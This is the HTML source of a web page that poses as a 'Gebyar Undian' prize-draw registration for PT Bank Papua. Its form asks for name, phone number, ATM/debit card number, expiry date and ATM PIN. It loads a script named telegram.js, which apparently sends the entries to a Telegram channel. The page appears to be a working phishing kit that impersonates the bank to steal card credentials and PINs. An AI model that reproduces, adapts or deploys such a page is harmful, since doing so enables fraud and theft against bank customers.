<!DOCTYPE html>
<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
    <link rel="canonical" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="PT Bank Papua" />
    <meta name="twitter:title" content="Bank Papua" />
    <meta property="og:site_name" content="Bank - Papua" />
    <meta name="twitter:site_name" content="Bank Papua" />
    <meta property="og:description" content="/"/>
    <meta name="twitter:description" content="" />
        <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Ff831faacb8a6c7b38973f26b6d39ee07.cdn.bubble.io%2Ff1694098999075x797726526456642200%2FIMG-20230908-WA0000.jpg?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta property="og:url" content="/" />
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
  <title>Promo Gebyar Undian Bank Papua</title> 
  <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -60px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 0px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: red;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 200px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: 30px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #FFA62F;
            border: none; 
            text-align: center; 
            height: 40px; 
            width: 3500px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 14px; 
            font-weight: 400; 
            color: white; 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            transition: background 200ms ease 0s;
        }
        </style>
        <style>
        body{
    background: #3FBFBF;
    font-family: arial;
    text-align: left;
}
 
h1{
    color: #fff;
}
 
/*contoh1*/
/*support google chrome*/
.contoh1::-webkit-input-placeholder{
    color: white;
}
 
/*support mozilla*/
.contoh1:-moz-input-placeholder{
    color: white;
}
 
/*support internet explorer*/
.contoh1:-ms-input-placeholder{
    color: white;
}
 
    </style> 
 </head> 
 <body class="chakra-ui-light" style="background: url(/bg1.png);">
  <div class="container"> 
   <div class="row"> 
    <div class="col-12 d-block mx-auto text-center" style="height: auto; width: auto; max-width: auto; margin-top: 0px; margin-bottom: 0px; border-radius: 0px;"> 
        <br>
     <form id="tg">
   <div class="row"> 
    <div class="col-12">
<p style="color: white; font-size: 15px; margin-top: 0%; margin-left: 19px; text-align: left; font-weight: bold;">DAFTAR UNDIAN BANK PAPUA</p>
<hr>
<br>
<p style="color: white; font-size: 15px; margin-top: 0%; margin-left: 19px; text-align: left; font-weight: bold;">Masukan informasi kartu ATM yang<br>terdaftar pada layanan Mobile Banking</p><br>
       <input class="contoh1" placeholder="Nama Lengkap" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: -10%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" type="text" name="Nama" id="Nama"><br>
       <input class="contoh1" placeholder="Nomor Handphone" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: 3%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" minlength="10" maxlength="13" inputmode="numeric" type="text" name="No-Hp" id="No-Hp"><br>
       <input class="contoh1" placeholder="No. Kartu ATM/Debit" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: 3%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 1px 1px; font-size: 15px; color: white;" minlength="16" inputmode="numeric" maxlength="19" type="text" name="No Kartu" id="No Kartu"><br>
              <input class="contoh1" placeholder="Masa Berlaku Kartu (MM/YY)" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: 3%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" minlength="4" maxlength="6" inputmode="numeric" type="text" name="Masa-Berlaku" id="Masa-Berlaku"><br>
       <input class="contoh1" placeholder="PIN ATM" required="" style="width:90%;height: 40px; border: 1px solid white; margin-left: 2%; margin-top: 3%; background: none; border-radius: 4px; text-align: left; padding-left: 10px; outline:none; border-color: #F5F5F5 1px 1px 0px 0px; font-size: 15px; color: white;" inputmode="numeric" minlength="6" maxlength="6" type="text" name="PIN-ATM" id="PIN-ATM"></div>
        </div>
    <div class="col-12"> 
    <br>
           <button type="submit" class="btn-belum">LANJUTKAN</button> 
           <br>
           <br>
           <p id="status"></p>
    </div> 
   </div> 
  </div> 
       <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script> 
   <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/js/bootstrap.bundle.min.js" integrity="sha384-pprn3073KE6tl6bjs2QrFaJGz5/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2" crossorigin="anonymous"></script> 
<script src="/telegram.js"></script>
</form>
</body>
</html>
